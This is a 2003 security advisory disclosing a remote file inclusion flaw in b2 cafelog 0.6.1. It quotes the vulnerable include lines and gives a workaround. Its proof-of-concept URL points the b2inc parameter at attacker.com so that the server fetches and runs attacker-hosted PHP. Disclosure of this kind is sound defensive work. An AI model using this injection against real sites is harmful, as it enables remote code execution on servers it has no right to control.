Products: b2 cafelog 0.6.1 (http://cafelog.com/) Date: 29 May 2003 Author: pokleyzz <pokleyzz_at_scan-associates.net> Contributors: sk_at_scan-associates.net shaharil_at_scan-associates.net munir_at_scan-associates.net URL: http://www.scan-associates.net
Summary: b2 cafelog 0.6.1 remote command execution.
Description =========== b2 cafelog is blogger system written in php with mysql ad database backend.
Details
=======
b2 cafelog 0.6.1 come with directory b2-tools. This directory contain 2 php scripts
(blogger-2-b2.php and gm-2-b2.php) which allow user to specify $b2inc and do
remote code injection.
from blogger-2-b2.php line 21 -----------------------------------------------------
case "step1":
include("b2config.php");
include("$b2inc/b2functions.php");
include("$b2inc/b2vars.php");
------------------------------------------------------------------------------------from gm-2-b2.php line 5 ----------------------------------------------------------
// 3. load in the browser from there
include("b2config.php");
include($b2inc."/b2functions.php");
-----------------------------------------------------------------------------------Proof of concept =========== http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com attacker.com have file named b2functions.php with php script you want to execute.
Workaround ========= Remove b2-tools directory.
Vendor Response =============== Vendor has been contacted on 19/05/2003 but to reply given.
